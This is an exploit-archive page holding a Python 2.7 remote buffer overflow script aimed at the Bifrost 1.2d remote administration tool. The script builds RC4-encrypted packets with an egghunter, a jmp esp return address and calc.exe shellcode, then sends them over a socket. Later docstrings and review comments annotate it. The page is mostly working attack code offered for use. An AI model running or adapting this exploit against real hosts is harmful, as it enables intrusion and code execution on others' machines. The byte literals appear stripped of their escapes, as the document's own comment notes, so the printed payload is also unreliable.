
# Title : Bifrost 1.2d - Remote Buffer Overflow
# Published : 2013-06-30
# Author :
# Previous Title : Bifrost 1.2.1 - Remote Buffer OverFlow
# Next Title : Seowonintech Devices - Remote root Exploit


#!/usr/bin/python2.7
#By : Mohamed Clay
import base64
import binascii
import socket
import sys
import threading
from itertools import izip, cycle
from time import sleep

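def rc4crypt(data, key):
    """Transform *data* with RC4 under *key*; the operation is its own inverse.

    Both arguments are byte strings (Python 2 ``str``).  The result is a
    ``str`` of the same length as *data*, assembled one ``chr`` at a time.
    RC4 is cryptographically weak; it is kept here only because the protocol
    on this page uses it.

    Args:
        data: plaintext or ciphertext to transform.
        key: non-empty key; the key-scheduling loop cycles through it.

    Returns:
        The transformed string.

    Raises:
        ZeroDivisionError: if *key* is empty (``i % len(key)``).
    """
    # Key-scheduling: permute the identity table 0..255 using the key.
    # list() keeps the table mutable on Python 3, where range() is immutable;
    # on Python 2.7 range() already returns a list, so behaviour is unchanged.
    box = list(range(256))
    klen = len(key)
    x = 0
    for i in range(256):
        x = (x + box[i] + ord(key[i % klen])) % 256
        box[i], box[x] = box[x], box[i]
    # Keystream generation: XOR every input byte with the next keystream byte.
    x = y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)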

def bif_len(s):
    """Right-pad hex string *s* with "00" pairs until it is at least 8 characters.

    Padding is applied two characters at a time, so an odd-length input ends
    up 9 characters long rather than 8.  Inputs that are already 8 or more
    characters are returned unchanged.
    """
    shortfall = 8 - len(s)
    # Each step adds two characters, so round the number of steps up.
    pairs_needed = max(0, (shortfall + 1) // 2)
    return s + "00" * pairs_needed

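def header(s):
    """Decode the 4-byte length prefix from the hex string *s*.

    The four bytes come from the character pairs s[0:2], s[2:4], s[4:6] and
    s[5:7]; the last pair overlaps the third, exactly as in the original
    logic, which is harmless for the zero-padded strings bif_len() produces.
    binascii.unhexlify replaces str.decode("hex"), which exists only on
    Python 2; on Python 2.7 the result is still a ``str``.

    Args:
        s: hex string of at least 7 characters (see bif_len).

    Returns:
        The four decoded bytes concatenated.

    Raises:
        IndexError: if *s* is shorter than 7 characters.
        binascii.Error (TypeError on 2.7): if a pair is not valid hex.
    """
    pairs = (s[0] + s[1], s[2] + s[3], s[4] + s[5], s[5] + s[6])
    return b"".join(binascii.unhexlify(p) for p in pairs)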

def random():
    """Return eight fields of 1000 "A" characters, each terminated by "|".

    The name shadows the standard-library ``random`` module, which this file
    does not import.
    """
    field = "A" * 1000 + "|"
    return field * 8


def exploit():
    """Send the module-level ``out`` buffer on the module-level socket ``s``.

    Runs on the daemon thread created at the bottom of the file, so this
    send overlaps the main thread's recv().
    """
    s.sendall(out)

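def usage():
    """Print the banner and command-line usage to stdout.

    Uses the print() form, which behaves identically to the Python 2
    ``print`` statement for a single string argument and also parses on
    Python 3.  The string literals are reproduced verbatim.
    """
    print("nnt***************************")
    print("t*    By : Mohamed Clay    *")
    print("t*  Bifrost 1.2d Exploit  *")
    print("t***************************n")
    print("t  Usage : ./bifrost1.2.1 host port")
    print("tExample : ./bifrost1.2.1 192.168.1.10 81nn")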


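# Entry point: require exactly "host port"; otherwise show usage and stop.
if len(sys.argv) != 3:
    usage()
    # sys.exit() instead of the site-module exit() helper, which is not
    # available when the interpreter runs with -S; both raise SystemExit.
    sys.exit()

HOST = sys.argv[1]
PORT = int(sys.argv[2])  # raises ValueError for a non-numeric port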

# Protocol constants and payload fragments.  NOTE(review): as printed on this
# page the literals below are plain ASCII text — each "xNN" group is three
# characters — so e.g. len(eip) is 16, not 4; the filler lengths computed
# further down inherit that.
key="xA3x78x26x35x57x32x2Dx60xB4x3Cx2Ax5Ex33x34x72x00"  # RC4 key handed to rc4crypt()

xor="xB2x9Cx51xBB" # we need this in order to bypass 0046A03E function
eip="x53x93x3Ax7E" # jmp esp User32.dll

egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

#calc.exe shellcode (badchars "x00")

# Built up line by line with +=; only its length is used in the filler
# arithmetic below and it is appended verbatim to the first packet.
buf ="xb8x75xd3x5cx87xd9xeexd9x74x24xf4x5bx31xc9" 
buf +="xb1x33x31x43x12x83xebxfcx03x36xddxbex72x44" 
buf +="x09xb7x7dxb4xcaxa8xf4x51xfbxfax63x12xaexca" 
buf +="xe0x76x43xa0xa5x62xd0xc4x61x85x51x62x54xa8" 
buf +="x62x42x58x66xa0xc4x24x74xf5x26x14xb7x08x26" 
buf +="x51xa5xe3x7ax0axa2x56x6bx3fxf6x6ax8axefx7d" 
buf +="xd2xf4x8ax41xa7x4ex94x91x18xc4xdex09x12x82" 
buf +="xfex28xf7xd0xc3x63x7cx22xb7x72x54x7ax38x45" 
buf +="x98xd1x07x6ax15x2bx4fx4cxc6x5exbbxafx7bx59" 
buf +="x78xd2xa7xecx9dx74x23x56x46x85xe0x01x0dx89" 
buf +="x4dx45x49x8dx50x8axe1xa9xd9x2dx26x38x99x09" 
buf +="xe2x61x79x33xb3xcfx2cx4cxa3xb7x91xe8xafx55" 
buf +="xc5x8bxedx33x18x19x88x7ax1ax21x93x2cx73x10" 
buf +="x18xa3x04xadxcbx80xfbxe7x56xa0x93xa1x02xf1" 
buf +="xf9x51xf9x35x04xd2x08xc5xf3xcax78xc0xb8x4c" 
buf +="x90xb8xd1x38x96x6fxd1x68xf5xeex41xf0xd4x95" 
buf +="xe1x93x28"


# Filler strings; their sizes are derived from the literal lengths above.
raw=(1000-533-len(egghunter))*"x90"
raw2=(1000-8-len(buf))*"x41"+"|"
command=30


# First packet: the one-byte command id (30 -> "1e") followed by the fixed
# fields and filler, RC4-encrypted and prefixed with the 4-byte length header.
# str.decode("hex") is Python 2 only.
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
# Length of the plaintext as hex, zero-padded by bif_len(), then decoded
# to bytes by header().  hex() already returns a str, so str() is redundant.
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out


# Second packet: a pipe-delimited record (judging by its contents, a client
# identification string — inferred, not confirmed).  Same encrypt-and-prefix
# steps; `l` is rebound to this packet's header.  It is sent first (see below).
data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:|C:|C:|MA|00000000|BifrosT v1.2d|"
out2=rc4crypt(data2,key)
l=header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2=l+out2

# Connect, send the second packet, then start the daemon thread that sends
# the first packet while the main thread blocks on a single recv().
th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)      # Thread.daemon = True is the current spelling
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)            # reply is discarded
# Python 2 print statements.  The script then ends without closing the
# socket; the daemon thread is stopped at interpreter shutdown.
print "n[*] By : Mohamed Clay"
print "[*] Exploit completedn"